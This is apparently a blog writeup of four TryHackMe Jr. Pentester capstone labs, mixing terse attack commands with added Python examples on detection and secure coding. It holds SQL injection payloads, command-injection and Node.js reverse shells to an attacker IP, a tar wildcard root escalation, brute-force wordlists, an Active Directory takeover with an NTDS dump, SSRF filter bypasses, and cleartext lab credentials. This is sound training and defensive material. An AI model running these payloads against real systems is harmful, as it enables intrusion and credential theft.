TryHackme Jr.Pentester Capstone Challenges
Tryhackme Jr.Pentester Challenges
Operation Promotion
export IP=Target_IP
[Scanning]
fscan -h $IP -p 1-65535 ALL ==> ports 22, 80, 139 and 445 open
nxc smb $IP
nxc smb $IP --generate-hosts /etc/hosts
nxc smb $IP --shares # We have access to the public share, but there is nothing interesting in it.
[Web Exploitation]
whatweb $URL -a 3
katana -u $URL -known-files all -jsluice -js-crawl -o Crawler-katana.txt
dirsearch -r -t 50 --deep-recursive --max-recursion-depth=3 -x 400,404 -u $URL
feroxbuster --url $URL -x php,txt,html,js,json,bak,config,sh,pl,cgi -t 50 -e
## Internal Login Portal
#### SQL Injections
admin' OR 1=1--
admin'--
admin' --
#### IDOR in the user id parameter: /admin/users/lookup.php?id=FUZZ
#### Fuzzing id with ffuf found id=7, whose description field discloses /admin/sysmaint-checks/ping.php
[Initial Access]
#### Parameter identification: the page takes ?host=<Target_IP>
curl -s "http://$IP/admin/sysmaint-checks/ping.php?host=192.168.195.14" # It actually pings the box.
#### Command Injection
# Quote the URL, otherwise your local shell runs everything after ';' instead of sending it.
# -G with --data-urlencode makes curl URL-encode the ';' and the spaces in the payload.
curl -s -G "http://$IP/admin/sysmaint-checks/ping.php" --data-urlencode 'host=192.168.195.14;id'
curl -s -G "http://$IP/admin/sysmaint-checks/ping.php" --data-urlencode 'host=192.168.195.14;which busybox nc'
##### Reverse shell (start a listener on port 9001 on the attacking machine first)
curl -s -G "http://$IP/admin/sysmaint-checks/ping.php" --data-urlencode 'host=192.168.195.14;/usr/bin/busybox nc 192.168.x.x 9001 -e sh'
[Post Exploitation]
##### Config file
cat /var/www/html/config/db.conf
==> the user jford and their password hash
##### Cracking Hash
The hash did not crack with the wordlists tried.
##### User Enumeration
cat /etc/passwd | grep -i 'sh$'
==> root,jford,ubuntu
##### Creating Wordlists for Brute Force
# One base word per year (season + year), then expand each with hashcat's dive.rule
echo "spring2025" > base2025.txt
hashcat --stdout base2025.txt -r /usr/share/hashcat/rules/dive.rule > wordlist2025.txt
echo "spring2026" > base2026.txt
hashcat --stdout base2026.txt -r /usr/share/hashcat/rules/dive.rule > wordlist2026.txt
##### Brute Force Password
hydra -l jford -P wordlist2026.txt $IP ssh <=== found password [xxxxxxxxx]
hydra -l jford -P wordlist2025.txt $IP ssh # not needed once the 2026 list hit
[SSH Login]
nxc ssh $IP -u 'jford' -p 'xxxxxxxxx'
[Root Exploitation]
sudo -l
=> (root) NOPASSWD: /usr/bin/find
[GTFOBins Cheatsheet]
sudo find . -exec /bin/sh -p \; -quit
Operation Coldstart
export IP=Target_IP
[Scanning]
fscan -h $IP -p 1-65535 ALL ==> ports 21, 22 and 80 open
[Web Exploitation]
whatweb $URL -a 3
katana -u $URL -known-files all -jsluice -js-crawl -o Crawler-katana.txt
dirsearch -r -t 50 --deep-recursive --max-recursion-depth=3 -x 400,404 -u $URL
feroxbuster --url $URL -x php,txt,html,js,json,bak,config,sh,pl,cgi -t 50 -e
[FTP Enum]
nxc ftp $IP -u 'Anonymous' -p 'Anonymous'
nxc ftp $IP -u 'Anonymous' -p 'Anonymous' --ls
nxc ftp $IP -u 'Anonymous' -p 'Anonymous' --get backup.tar.gz
[Source Code Review]
tar xvf backup.tar.gz
##### Found manually
Host:- kestrel.thm
Path:- /admin or /admin/notes
##### Found with automation
opengrep scan --config auto . # scan the backup's source code
Attack:- SSRF
[Initial Exploitation]
##### SSRF (URLs fed to the vulnerable fetch parameter; the server fetches them and hands back the body)
http://kestrel.thm # Returns the whole internal page
http://kestrel.thm/admin # Returns the volt lab admin endpoint
http://kestrel.thm/admin/notes # Returns the creds
user:- webdev
pass:- xxxxxxxx
[SSH Login]
nxc ssh $IP -u 'webdev' -p 'xxxxxxx'
ssh webdev@$IP ---> Logged in successfully!
[Post Exploitation]
# DETECTION
cat /etc/cron.d/Cron_Name_Here
# * * * * * root cd /opt/backups && tar czf /var/backups/uploads.tgz *
# ^
# runs as root + wildcard in writable directory
# EXPLOITATION
cd /opt/backups
# payload: creates SUID bash
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' > shell.sh
touch -- '--checkpoint=1' # creates a file named --checkpoint=1
touch -- '--checkpoint-action=exec=sh shell.sh' # creates a file named --checkpoint-action=exec=sh shell.sh
# Wait for cron to run, then:
/tmp/bash -p # -p preserves root effective UID
# BEHIND THE SCENES
# Shell expands * into all filenames before tar runs, so tar sees:
tar czf /var/backups/uploads.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh
# ↑ these are actually filenames, but tar treats them as real flags
# --checkpoint-action tells tar to execute shell.sh as root
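The DETECTION step above, turned into a small scanner for cron.d entries: an added example, not code from the lab or from this writeup. The cron contents below are constructed for the example; the first job is the line from the page, the other two are filler. A job is flagged only when it runs as root, cd's somewhere, and passes tar a glob whose expansion can start with `-` (a bare `*`, not `cache/*.tmp`), which is exactly the condition the `--checkpoint` filenames abuse.

```python
import os
import re
import shlex

# Constructed sample of what `cat /etc/cron.d/*` might show. The first job
# mirrors the backup line from the page; the others are filler.
SAMPLE_CRON_D = """\
# m h dom mon dow user command
* * * * * root cd /opt/backups && tar czf /var/backups/uploads.tgz *
0 3 * * * root /usr/bin/certbot renew -q
*/5 * * * * www-data cd /var/www/html && rm -f cache/*.tmp
"""

# cron.d format: five schedule fields, the run-as user, then the command.
CRON_LINE = re.compile(r"^\s*((?:\S+\s+){5})(\S+)\s+(.+)$")


def parse_cron_d(text: str) -> list[dict]:
    """Parse cron.d-style lines into schedule / user / command records."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append({"schedule": m.group(1).strip(),
                         "user": m.group(2),
                         "command": m.group(3)})
    return jobs


def leading_glob(arg: str) -> bool:
    """A glob whose expansion can begin with '-', so a filename becomes a flag."""
    return arg[:1] in ("*", "?")


def wildcard_tar_findings(jobs: list[dict]) -> list[dict]:
    """Flag root jobs that cd into a directory and run tar on a bare glob."""
    findings = []
    for job in jobs:
        if job["user"] != "root":
            continue
        cwd = None
        # Walk the command segment by segment so `cd X && tar ... *` is understood.
        for segment in re.split(r"&&|\|\||;", job["command"]):
            argv = shlex.split(segment.strip())
            if not argv:
                continue
            if argv[0] == "cd" and len(argv) > 1:
                cwd = argv[1]
            elif os.path.basename(argv[0]) == "tar" and any(leading_glob(a) for a in argv[1:]):
                findings.append({"dir": cwd, "command": job["command"]})
    return findings


def can_write(path: str) -> bool:
    """True if the current user can create files in the directory; a finding
    there is exploitable, as /opt/backups was for webdev on the page."""
    return os.path.isdir(path) and os.access(path, os.W_OK)


if __name__ == "__main__":
    for f in wildcard_tar_findings(parse_cron_d(SAMPLE_CRON_D)):
        print(f"root tar wildcard in {f['dir']} (writable: {can_write(f['dir'])}): {f['command']}")
```

On a real box, feed it the concatenated contents of /etc/cron.d/* and /etc/crontab; the `can_write` check is what separates a finding from an exploitable one.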
Dead Drop
Web Server Exploitation
export IP=Target_IP
#### Scanning
fscan -h $IP -p 1-65535 ALL ==> ports 22 and 80 open
#### Web login Portal
==> [SQL Injection Bypass]
admin'--
admin' AND 1=1--
==> [SQL Injection Database Extraction]
sqlmap -r req.txt --batch --risk=3 --level=5 --dbs -T users --dump
back-end DBMS: SQLite
Tables:- sqlite_sequence, users
{Extracted Database Credentials}:-
svc-backup:xxxxxx
admin:xxxxxxx
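The login bypass used here and in Operation Promotion, as an added example that is not part of the original writeup: a SQLite-backed login written both ways, so the injected quote and `--` can be watched working against string formatting and failing against bound parameters, plus the UNION trick that pulls the whole `users` table through the same query (the manual version of what sqlmap's `--dump` did above). Only the DBMS and the table name come from the page; the columns, rows and placeholder passwords are constructed for the example.

```python
import sqlite3


def build_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for the app's SQLite database.

    Constructed for this example: the table name matches the one sqlmap
    dumped, the rows and passwords are placeholders.
    """
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "placeholder-admin-pw"), ("svc-backup", "placeholder-svc-pw")],
    )
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """The injectable pattern: user input spliced into the SQL text.

    With username = "admin'--" the query becomes
        ... WHERE username = 'admin'--' AND password = '...'
    and SQLite drops everything after the comment marker, so the
    password check disappears.
    """
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: the quote and '--' are data, not SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def extract_via_union(con: sqlite3.Connection) -> list[str]:
    """Use the same injectable query to pull every credential in one request.

    The legitimate WHERE matches nothing; the UNION appends user:password
    pairs from the whole table to the (empty) result.
    """
    payload = "x' UNION SELECT username || ':' || password FROM users--"
    rows = con.execute(
        "SELECT username FROM users "
        f"WHERE username = '{payload}' AND password = ''"
    ).fetchall()
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = build_sample_db()
    for payload in ("admin'--", "admin' AND 1=1--", "admin' OR 1=1--"):
        print(payload, "->", login_vulnerable(db, payload, "wrong"),
              "| safe ->", login_safe(db, payload, "wrong"))
    print("dumped:", extract_via_union(db))
```

Bound parameters are the whole fix; the `--` payloads that open the portal are not special characters to the driver, so there is nothing to filter.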
==> [Reverse shell]
{pwn.js}:-
require('child_process').exec(
'bash -c "bash -i >& /dev/tcp/192.168.x.x/9001 0>&1"'
)
==> [Credential Hunting on Web server and Cracking Hash]
{shadow.bak} file found! It is a backup of /etc/shadow, so the entries are Linux crypt(3) hashes; john detects the format on its own.
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.bak
svc-drop:xxxxxxxxxxxx
==> [SSH Login]
svc-drop:xxxxxxxxxxxx
==> [APK Decompilation]
/home/svc-drop/backup/deaddrop-mobile.apk --> decompile it with jadx-gui
{Global search} (Ctrl+Shift+F) ==> search for "username" and "password"
Found creds j.harris:xxxxxxxxxxxxx2026!
Pivoting using ligolo-ng
updating..
DC and WRK
[Initial Access]
Put the collected usernames and passwords into files and spray them over the DC and WRK.
nxc smb $DC -u users -p passwd --continue-on-success # 'users' and 'passwd' are files, one entry per line
==> j.harris:xxxxxxxxxx
[Post Exploitation]
##### Bloodhound
nxc ldap $DC -u 'j.harris' -p 'xxxxxx' --bloodhound --collection All --dns-server $DC
bloodhound-python -d deaddrop.loc -u 'j.harris' -p 'xxxxxxx' -ns $DC -dc DEADDROP-DC.deaddrop.loc -c All --zip
bloodyAD --host $DC -d deaddrop.loc -u 'j.harris' -p 'xxxxxx' get bloodhound --transitive --path .
rusthound --domain deaddrop.loc -u 'j.harris' -p 'xxxxxxxx' --zip
##### lilzey
connect j.harris $PASS deaddrop.loc 192.168.11.100
==> kerberoasting
==> checkacl {Found}:- AddMembers Permissions over Admin Groups.
##### AddMembers to ITSupport-Admin Group
bloodyAD --host DEADDROP-DC.deaddrop.loc -d deaddrop.loc -u j.harris -p xxxxxxxx add groupMember "ITSupport-Admins" j.harris
[Dumping]
nxc smb $DC -u 'j.harris' -p 'xxxxx' --ntds
nxc smb $DC -u 'j.harris' -p 'xxxxx' -x 'type C:\users\administrator\desktop\flag.txt'
[Bonus]
┌──(root㉿kali)-[/capstone/loot]
└─# nxc smb $DC -u 'j.harris' -p 'xxxxxxxxxx' -x 'type C:\users\administrator\desktop\flag.txt'
SMB 192.168.11.100 445 DEADDROP-DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DEADDROP-DC) (domain:deaddrop.loc) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.11.100 445 DEADDROP-DC [+] deaddrop.loc\j.harris:xxxxxxx (Pwn3d!)
SMB 192.168.11.100 445 DEADDROP-DC [+] Executed command via wmiexec
SMB 192.168.11.100 445 DEADDROP-DC THM{d34d_dr0p_d0m41n_pwn3d}
[Creds File]
svc-backup:BackupAgent2024
admin:SuperSecretAdm1n!
svc-drop:dropsofjupiter
j.harris:DropsOfJupiter2026!
Interceptor
export IP=Target_IP
#### Scanning
fscan -h $IP -p 1-65535 ALL ==> ports 22 and 80 open
#### Web server Exploitation
[SQL Injection] ==> Failed
[Brute Force Credentials] ==> Failed
[Directory Fuzzing]
##### Fuzzing extensions saved the day!
dirsearch -r -t 50 --deep-recursive --max-recursion-depth=3 -x 400,404 -u $URL -e bak,php,php.bak,config,php.config
feroxbuster --url $URL -x php,txt,html,js,json,bak,php.bak,config,sh,pl,cgi -t 50 -e
==> login.php.bak
[Password File Generation]
Hint :- MediaHub + any year (case matters: the hit below was MediaHub2026, so keep the product's own casing in the list as well)
Mediahub2020
Mediahub2021
Mediahub2022
Mediahub2023
Mediahub2024
Mediahub2025
Mediahub2026
[Credential Brute Force]
hydra -l admin@mediahub -P Custom-password.txt -s 80 -f $TARGET http-get ==> MediaHub2026 worked!
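The two hand-built lists on this page (season + year in Operation Promotion, product name + year here) follow one recipe, so here it is as a generator: an added example, not a tool from the lab or from this writeup. It produces base word x casing x year x suffix, most probable candidates first, and keeps the as-typed casing (MediaHub) next to the capitalised one (Mediahub), which is the difference that would have cost the hit above. The leet pass is a tiny hand-picked subset of what hashcat's dive.rule does; the suffix list is an assumption.

```python
import itertools

# Hand-picked leet substitutions; a small subset of dive.rule's mutations.
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})


def leet(word: str) -> str:
    return word.translate(LEET)


def case_variants(word: str) -> list[str]:
    """Most likely casing first; dedup keeps the first occurrence."""
    ordered = [word.capitalize(), word, word.lower(), word.upper()]
    seen, out = set(), []
    for w in ordered:
        if w not in seen:
            seen.add(w)
            out.append(w)
    return out


def build_wordlist(base_words, years, suffixes=("", "!", "#", "1", "123"),
                   include_leet=False) -> list[str]:
    """Base word x casing x year (newest first, 4- and 2-digit) x suffix.

    Ordered so the most probable candidates come out first, which matters
    when hydra is rate-limited or a lockout threshold is in play.
    """
    out, seen = [], set()
    for word in base_words:
        variants = case_variants(word)
        if include_leet:
            variants += [leet(v) for v in variants]
        for w, year in itertools.product(variants, sorted(years, reverse=True)):
            for y in (str(year), str(year)[-2:]):
                for suf in suffixes:
                    cand = f"{w}{y}{suf}"
                    if cand not in seen:
                        seen.add(cand)
                        out.append(cand)
    return out


if __name__ == "__main__":
    import sys
    # Usage: python3 gen.py MediaHub spring > Custom-password.txt
    words = sys.argv[1:] or ["MediaHub"]
    for cand in build_wordlist(words, range(2020, 2027)):
        print(cand)
```

For the lab, `python3 gen.py MediaHub > Custom-password.txt` gives hydra the same list as above plus the casing and suffix variants; for SSH, where hashcat is available anyway, piping the output through dive.rule is still the bigger net.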
[OTP Bypass]
The app only checked whether the OTP was marked as verified.
Bypass ==> intercept the response, replace the object and set is_verified=True.
[Post Exploitation Over Website]
##### File Upload bypass ==> Failed
Tried many upload bypasses (GIF polyglots and more); none of them worked.
##### SSRF bypass ==> Pass
For this one I read a writeup: SSRF combined with command injection.
[Filters Bypass]
http://127.0.0.1/ <-- on its own this is probably blocked by the filter.
### Failed
http://127.0.0.1;id
http://127.0.0.1|id
http://127.0.0.1&id
http://127.0.0.1\nid or http://127.0.0.1%0aid
### Worked
http://127.0.0.1`id`
http://127.0.0.1$(id)
[Command Injection Worked]
http://127.0.0.1$(which busybox)
http://127.0.0.1$(busybox nc 192.168.x.x 9001 -e bash)
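Both injection points on this page (the ping.php host parameter in Operation Promotion and the URL fetch here) fail the same way: the value reaches a shell and a denylist of metacharacters is the only guard. The example below is added here and is not code from the lab or from any writeup; the denylist is an assumption reconstructed from which payloads were blocked above. It shows the `$( )` and backtick payloads passing that denylist while an allowlist (a literal IP or hostname, then argv with no shell) rejects them, and adds the SSRF check the fetch needed as well, since a valid `127.0.0.1` must also be refused.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumed reconstruction of the lab's filter: every blocked payload above
# carried one of these characters, the two that worked carried none.
DENYLIST = (";", "|", "&", "\n", "\r")

# RFC 1123 style hostname: labels of letters, digits and inner hyphens.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def denylist_allows(value: str) -> bool:
    """The weak check: passes if no banned character is present."""
    return not any(bad in value for bad in DENYLIST)


def shell_line_vulnerable(host: str) -> str:
    """What ping.php effectively hands to /bin/sh once its check passes."""
    return f"ping -c 1 {host}"


def is_valid_host(host: str) -> bool:
    """Allowlist: an IP literal or a DNS hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME.match(host) is not None


def ping_argv_safe(host: str) -> list[str]:
    """Validated host passed as a single argv element; no shell is involved,
    so `$(id)` would be pinged as a literal name, not executed."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


def is_safe_fetch_url(url: str) -> bool:
    """SSRF guard for a server-side fetch: http(s) only, a well-formed host,
    and no literal loopback/private/link-local address.

    A production check must also resolve the name and test every returned
    address (and pin the result for the actual connection); this offline
    example stops at the literal.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    host = parts.hostname or ""
    if parts.scheme not in ("http", "https") or not is_valid_host(host):
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True  # syntactically valid hostname; resolution check omitted here
    return not (addr.is_loopback or addr.is_private
                or addr.is_link_local or addr.is_reserved)


if __name__ == "__main__":
    for p in ("http://127.0.0.1;id", "http://127.0.0.1$(id)", "http://127.0.0.1`id`"):
        print(f"{p:26} denylist: {denylist_allows(p)!s:5} allowlist: {is_safe_fetch_url(p)}")
```

The point of the pairing: the denylist has to enumerate every way a shell can be asked to run something, while the allowlist only has to describe what a host looks like, and passing the value as argv removes the shell from the picture entirely.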
[Post Exploit]
##### Database Extraction and Credentials
MySQL running:-
[mysql:3360]
Config file:-
[config.js]
##### Root (unintended) <- read on 0xb0b's website!
## 2026 Copy Fail exploit
root@interceptor:~# cd /root;ls
snap
root@interceptor:~# echo "0xmr was here...? Can you See Me my Website 0xmrsecurity.github.io" > tryhackme-Note.txt
root@interceptor:~# cat tryhackme-Note.txt
0xmr was here...? Can you See Me my Website 0xmrsecurity.github.io
I keep updating all challenge writeups…
This post is licensed under CC BY 4.0 by the author.
